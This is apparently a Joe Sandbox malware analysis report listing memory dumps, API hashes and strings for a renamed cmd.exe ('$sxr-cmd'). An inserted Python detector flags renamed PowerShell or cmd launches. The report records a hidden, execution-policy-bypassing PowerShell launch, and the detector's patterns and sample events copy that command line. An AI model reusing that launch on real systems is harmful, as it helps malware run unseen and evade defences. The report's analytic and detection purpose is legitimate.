• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
• String ID:
• API String ID: 611521582-0
• Opcode ID: d412da15cb949554b081a41741d7db10ae4ffc54f36c72ea7b4e9065a2faff7a
• Instruction ID: bbc9e7ac8e455636eebe41b476ae350b5c51b775c11c174e6cb7e768ec0b673a
• Opcode Fuzzy Hash: d412da15cb949554b081a41741d7db10ae4ffc54f36c72ea7b4e9065a2faff7a
• Instruction Fuzzy Hash: DCA1B122B08E128AF794AB61E8402BDEAA1FB4DB65F845135CD0E67784DF7DD44DC320
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
• String ID: \\?\
• API String ID: 628682198-4282027825
• Opcode ID: bc7a4c5315452527efdd1b4c54bcb63c24ecfd4bbeb423885ae225a5c15832f3
• Instruction ID: 9ed78c816c181047f9671503d0d6a20b0977f806d2f36ced8505a8846bafde02
• Opcode Fuzzy Hash: bc7a4c5315452527efdd1b4c54bcb63c24ecfd4bbeb423885ae225a5c15832f3
• Instruction Fuzzy Hash: 37E1A621B08A8296EBE0AF24D8803F9A7A0FB49765F804235D91E677D4DF3CD54DC710
Uniqueness
Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • GOTO, xrefs: 00007FF7137ED0A3
                                                                                                            • C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO, xrefs: 00007FF7137FC9F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                            • String ID: C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO$GOTO
                                                                                                            • API String ID: 3863671652-1657151780
                                                                                                            • Opcode ID: a81ad13440b0a5d5f52291989616d259ae80dd99547c53806a4f383952b1c558
                                                                                                            • Instruction ID: 785204c4f6db541666d36e2a37bee7f5d424030d19a3fb189d289bce23fcb2e7
                                                                                                            • Opcode Fuzzy Hash: a81ad13440b0a5d5f52291989616d259ae80dd99547c53806a4f383952b1c558
                                                                                                            • Instruction Fuzzy Hash: D9E19B25A09E438AFFE4BB1994943B9E694BF49760FC44235D91E362D1DF3DE84D8230
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

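The string ID a few lines above shows the host process launching a renamed copy of PowerShell from `C:\Windows\$sxr-powershell.exe` with `-WindowStyle hidden -ExecutionPolicy bypass`, and the snapshot file names for this dump end in `$sxr-cmd`, so cmd.exe appears to have been renamed the same way. The following is an added detection example, not code from this Joe Sandbox report or from the sample: it scores process-creation events on the mismatch between the on-disk image name and the PE version resource's `OriginalFileName`, which renaming the file does not change. The Sysmon Event ID 1 field names (`Image`, `OriginalFileName`, `CommandLine`) are an assumption, and the four events are constructed to mirror the launch seen in the report; the `-Command` body is truncated in the report's string and is left as it appears there.

```python
"""Flag powershell.exe / cmd.exe running under a renamed image or from an odd path.

Added example, not Joe Sandbox code. Field names follow Sysmon Event ID 1 and
are an assumption; SAMPLE_EVENTS are constructed to mirror the renamed
C:\\Windows\\$sxr-powershell.exe launch recorded in the report's string IDs.
"""
import re
from typing import Dict, List, Tuple

# OriginalFileName (lower-cased, from the PE version resource) -> directories the
# genuine binary is installed in. Renaming the file on disk leaves this field intact.
KNOWN_HOSTS = {
    "powershell.exe": {
        r"c:\windows\system32\windowspowershell\v1.0",
        r"c:\windows\syswow64\windowspowershell\v1.0",
    },
    "cmd.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
}

# powershell.exe accepts unambiguous prefixes of its switches, so match the
# common short forms (-ep, -ex, -exec) as well as the full switch names.
EXEC_POLICY_RE = re.compile(r"-e(?:p|x\w*)\s+(?:bypass|unrestricted)\b", re.I)
HIDDEN_RE = re.compile(r"-w(?:in\w*)?\s+hidden\b", re.I)


def assess(event: Dict[str, str]) -> List[str]:
    """Return the reasons this process-creation event looks suspicious (empty if none)."""
    findings: List[str] = []
    directory, _, name = event.get("Image", "").lower().rpartition("\\")
    orig = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")

    if orig in KNOWN_HOSTS:
        if name != orig:
            findings.append(f"renamed binary: image {name!r} has OriginalFileName {orig!r}")
        if directory not in KNOWN_HOSTS[orig]:
            findings.append(f"{orig} running from unusual directory {directory!r}")
    if orig == "powershell.exe":
        if EXEC_POLICY_RE.search(cmd):
            findings.append("execution policy overridden on the command line")
        if HIDDEN_RE.search(cmd):
            findings.append("hidden window requested on the command line")
    return findings


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Keep only the events with findings, paired with their reasons."""
    hits = []
    for event in events:
        reasons = assess(event)
        if reasons:
            hits.append((event["Image"], reasons))
    return hits


# Constructed events (not taken from the report's own logs). The first mirrors the
# report's string ID; its -Command body is truncated there and is left as-is.
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\$sxr-powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": r'"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive '
                       r"-WindowStyle hidden -ExecutionPolicy bypass -Command function VO",
    },
    {
        "Image": r"C:\Windows\$sxr-cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": r'"C:\Windows\$sxr-cmd.exe"',
    },
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe -NoProfile -Command Get-Date",
    },
    {
        "Image": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": "cmd.exe /c whoami",
    },
]

if __name__ == "__main__":
    for image, reasons in triage(SAMPLE_EVENTS):
        print(image)
        for reason in reasons:
            print("  -", reason)
```

The renamed-image and unusual-directory findings are the high-confidence ones; an execution-policy override on its own is common in legitimate administration and should only raise priority, not alert by itself. `OriginalFileName` is read from the version resource and can be patched by an attacker who controls the file, so pair this check with the image's hash or Authenticode status rather than relying on it alone; Windows Security event 4688 does not carry the field at all, which is why the example assumes Sysmon.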
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                            • String ID: $Application$System
                                                                                                            • API String ID: 3538039442-1881496484
                                                                                                            • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                            • Instruction ID: c8460a4ae2ae57995e976161c1e9930d3b1649b09c5987e4dcb716cc5db7609a
                                                                                                            • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                            • Instruction Fuzzy Hash: 9E51BD36A08F4187EBA0AB15B44067AFAA1FB89B64F858234DE4E13750DF3DD459C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                            • String ID: COPYCMD$\
                                                                                                            • API String ID: 3989487059-1802776761
                                                                                                            • Opcode ID: 05ae0ec2d06d2a9ef41bc112d7715d0f7644bc311c2d5fc207196218d88fa946
                                                                                                            • Instruction ID: 7b51286a930052a62b9f98172a699d8703c22db99dcfc903aa18162a781eb140
                                                                                                            • Opcode Fuzzy Hash: 05ae0ec2d06d2a9ef41bc112d7715d0f7644bc311c2d5fc207196218d88fa946
                                                                                                            • Instruction Fuzzy Hash: DFF1D625B08B4685FB90BB15D4802BAE7A0FF49BA8F844135DA4E2B794DF3DE45DC320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                            • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                            • API String ID: 55602301-2548490036
                                                                                                            • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                            • Instruction ID: 068004af3a778345dcdb04caba5907a8b5e1c2cf67419a963a55b02375cc551f
                                                                                                            • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                            • Instruction Fuzzy Hash: E5A1A732A18F4296EB90AB14E4802B9F7A5FB48B74FD00535DA6D27A94EF3CD55CC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 3935429995-0
                                                                                                            • Opcode ID: 795fcaf9b1b37c27bcdc7aeab39e4ea5de5f10c23baa64d7e6cd9433ecd74678
                                                                                                            • Instruction ID: 7a665795f95f1567f94edd0c4350f643c85eb93aba9a0d1b5c43dfae8d00fe3e
                                                                                                            • Opcode Fuzzy Hash: 795fcaf9b1b37c27bcdc7aeab39e4ea5de5f10c23baa64d7e6cd9433ecd74678
                                                                                                            • Instruction Fuzzy Hash: 79610222A18B528AE790EF21A404679FBA4FF88F64F858130DE4E53794DF7ED419C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 6714b57ab64ccf1cb705dfdd5569d9287a74fd628b1eac91bf894110f45b7a1d
                                                                                                            • Instruction ID: 53443fd7dbd19c3637012c6ed3d149f2d577740c10949265f967fb11584e8f0d
                                                                                                            • Opcode Fuzzy Hash: 6714b57ab64ccf1cb705dfdd5569d9287a74fd628b1eac91bf894110f45b7a1d
                                                                                                            • Instruction Fuzzy Hash: E391B336608E828AEBA4AF24D8502FDB6E0FB49765F804235DA4E5B794DF3DD55CC320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _get_osfhandlememset$wcschr
                                                                                                            • String ID: DPATH
                                                                                                            • API String ID: 3260997497-2010427443
                                                                                                            • Opcode ID: 41e54b0670c20d72ba7f015e67b536ed96c4d732916ea9d551e972c5a3ecdbc5
                                                                                                            • Instruction ID: 26ca983bc1ca28de8746fb18101fb820bf6f1a11b97ecdc73b89f322b528c133
                                                                                                            • Opcode Fuzzy Hash: 41e54b0670c20d72ba7f015e67b536ed96c4d732916ea9d551e972c5a3ecdbc5
                                                                                                            • Instruction Fuzzy Hash: 19D1A022A08E4286EB94BB65D4801BDA7A5FF48BB4F844231D92D677D4DF3CE81DC360
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                            • String ID: @P
                                                                                                            • API String ID: 1801357106-3670739982
                                                                                                            • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                            • Instruction ID: 77903d77919740aa04e3f0bccbcf5350a37306cb543ba40389e47e4712f6be68
                                                                                                            • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                            • Instruction Fuzzy Hash: D5417B32B04E45DFE750AF60D4803EDABA4FB89768F848235DA1D66A88DF78D518C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$BufferConsoleInfoScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1034426908-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseValue$CreateDeleteOpen
                                                                                                            • String ID: %s=%s$\Shell\Open\Command
                                                                                                            • API String ID: 4081037667-3301834661
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71380AA85
                                                                                                            • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71380AACF
                                                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71380AAEC
                                                                                                            • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7138098C0), ref: 00007FF71380AB39
                                                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7138098C0), ref: 00007FF71380AB6F
                                                                                                            • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7138098C0), ref: 00007FF71380ABA4
                                                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7138098C0), ref: 00007FF71380ABCB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteValue$CreateOpen
                                                                                                            • String ID: %s=%s
                                                                                                            • API String ID: 1019019434-1087296587
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsnicmpwcsrchr
                                                                                                            • String ID: COPYCMD
                                                                                                            • API String ID: 2429825313-3727491224
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$FullNamePathwcsrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 4289998964-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3140674995-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3476366620-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
